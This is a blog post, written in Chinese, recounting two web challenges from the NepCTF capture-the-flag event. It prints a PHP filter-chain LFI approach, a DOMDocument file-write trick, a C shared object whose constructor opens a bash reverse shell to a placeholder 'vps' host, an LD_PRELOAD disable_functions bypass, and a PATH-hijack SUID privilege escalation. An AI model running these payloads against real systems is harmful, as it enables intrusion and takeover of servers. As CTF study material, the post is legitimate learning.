nepctf

之前打的nepctf复现一下web的两道题

 首先是web的ez_java_checkin

交了flag的环境不知道咋开了,思路就是按照给的提示,提示说有个很老的java的洞,找了半天发现是shiro,然后直接拿shiro工具一把梭

 等进去之后写个asp马连上

根目录下会发现一个flag,还有个start.sh和jar的文件,flag没有读权限,没太搞懂,当时做了半天没做出来,第二天发现start.sh里突然有flag了

但是正确的做法是find提权,当时也不知道怎么回事没想起来

下一个是ezinclude,没做上,看着大佬wp复现的

 进到页面中之后是这样的:

 

 初步尝试之后没什么思路

删掉参数得到提示

 

 去提示里给的文章看学习LFI:https://tttang.com/archive/1395/

说实话没太看懂,等有时间仔细学学,先拿大佬给的脚本跑了:https://github.com/synacktiv/php_filter_chain_generator

下载后运行会生成payload

如果是linux运行记得在$_POST前加上反斜杠转义,不然终端会将它当成变量,生成的也是错的

 正常的:

 然后放到get请求中的link里,post中写上命令

 然后可以直接用一键连接了,但是

 

 想着正好能用之前那个双链表用后释放试试,结果发现哥斯拉死活连不上,目录权限又没有,只有一个/tmp权限,只能试试按照大佬的方法,估计也是绕过disable最常用的方法,很多文章都给这种方式放在第一

但是忽然发现tmp也上传不了

看大佬给的文章https://longlone.top/%E5%AE%89%E5%85%A8/%E5%AE%89%E5%85%A8%E7%A0%94%E7%A9%B6/%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E4%B8%8B%E7%9A%84php%E5%8E%9F%E7%94%9F%E7%B1%BB%E5%88%A9%E7%94%A8/#domdocument

加上大佬写的.so提权(LD那个太长了,就叫.so提权吧)

这里蚁剑有个代码执行的插件还挺好用的,不用去库库改post的值

 

 传文件的代码是这一串:

1 $f="/tmp/poc.so";
2 $d=new DOMDocument();
3 $d->loadHTML("xxxxxxx");
4 $d->saveHtmlFile("php://filter/string.strip_tags|convert.base64-decode/resource=$f");

把loadHTML中的内容改成要传的内容,这里需要用c语言写好再用gcc编译,转成so文件之后base64编码一次,url编码一次(不在蚁剑里的话),然后放进去

c的代码:

1 #include <stdio.h>
2 #include <unistd.h>
3 #include <stdio.h>
4 __attribute__ ((__constructor__)) void angel (void){
5     unsetenv("LD_PRELOAD");
6     system("bash -c 'bash -i >& /dev/tcp/vps/7788 0>&1'");
7 }

记得把vps和端口换成自己的

 这边就写进来了

 然后再执行:

1 var_dump(scandir("/tmp/"));
2 putenv("LD_PRELOAD=/tmp/poc.so");
3 mb_send_mail("","","");

 这边收到shell,然后就是提权,查一手suid

 根目录底下还有个src.c,应该是showmsg的源码

 

 调用了cat,可以用环境变量提权

环境提权的过程:

1 cd /tmp
2 echo “/bin/bash” > cat
3 chmod 777 cat
4 echo $PATH
5 export PATH=/tmp:$PATH
6 cd /7 ./showmsg
8 whoami

 然后就可以读flag了

这里记得cat已经用来提权了,现在不能用来读文件,可以用head,tail,tac等其他方法来读

 

 

posted @ 2023-08-22 19:32  TheBlackEagle  阅读(38)  评论(0编辑  收藏  举报